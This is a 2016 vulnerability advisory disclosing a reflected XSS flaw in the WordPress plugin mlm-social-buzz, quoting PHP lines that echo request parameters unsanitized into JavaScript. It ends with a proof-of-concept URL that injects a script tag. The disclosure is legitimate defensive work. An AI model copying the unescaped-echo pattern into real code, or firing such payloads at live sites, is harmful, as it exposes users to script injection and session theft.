Advisory #: 31
Title: Reflected XSS in wordpress plugin mlm-social-buzz v1.2.1
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/mlm-social-buzz
Downloads: 1480
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: mlm-social-buzz
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./mlm-social-buzz/top-blog-posts.php: 179: document.domain = '<?php echo $_GET["tbpv_domain"]; ?>'; 182: /*document.write('<div style="display:none;"><a id="tbpv_login" href="<?php //echo WEBSITE_URL; ?>wp-voting-login.php?redirect_to='+location1[0]+'&tbpv_affiliate=<?php //echo $_GET["tbpv_affiliate"]; ?>" target="_blank">Login</a></div>'); 184: window.open("<?php echo WEBSITE_URL; ?>wp-voting-login.php?redirect_to="+location1[0]+"&tbpv_affiliate=<?php echo $_GET["tbpv_affiliate"]; ?>","","menubar=0,resizable=1,status=1,toolbar=0,location=0"); 187: parent.show_login_form(<?php echo $_GET["tbpv_id"]; ?>, location.href, '<?php echo $_GET["tbpv_affiliate"]; ?>'); 191: location.href = '<?php echo WEBSITE_URL; ?>top_blog_posts.php?tbpv_id=<?php echo $_GET["tbpv_id"]; ?>&tbpv_username=<?php echo urlencode($_GET["tbpv_username"]); ?>&tbpv_domain=<?php echo urlencode($_GET["tbpv_domain"]); ?>&tbpv_affiliate=<?php echo urlencode($_GET["tbpv_affiliate"]); ?>&tbpv_button_style=<?php echo urlencode($_GET["tbpv_button_style"]); ?>'; 199: document.domain = '<?php echo $_GET["tbpv_domain"]; ?>'; 202: /*document.write('<div style="display:none;"><a id="tbpv_login" href="<?php //echo WEBSITE_URL; ?>wp-voting-login.php?redirect_to='+location1[0]+'&tbpv_affiliate=<?php //echo $_GET["tbpv_affiliate"]; ?>" target="_blank">Login</a></div>'); 204: window.open("<?php echo WEBSITE_URL; ?>wp-voting-login.php?redirect_to="+location1[0]+"&tbpv_affiliate=<?php echo $_GET["tbpv_affiliate"]; ?>","","menubar=0,resizable=1,status=1,toolbar=0,location=0"); 207: parent.show_login_form_follow(location.href,'<?php echo $_GET["tbpv_affiliate"]; ?>'); The variable tbpv_domain appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./mlm-social-buzz/top-blog-posts.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/mlm-social-buzz/top-blog-posts.php?tbpv_domain="><script>alert(1);</script><"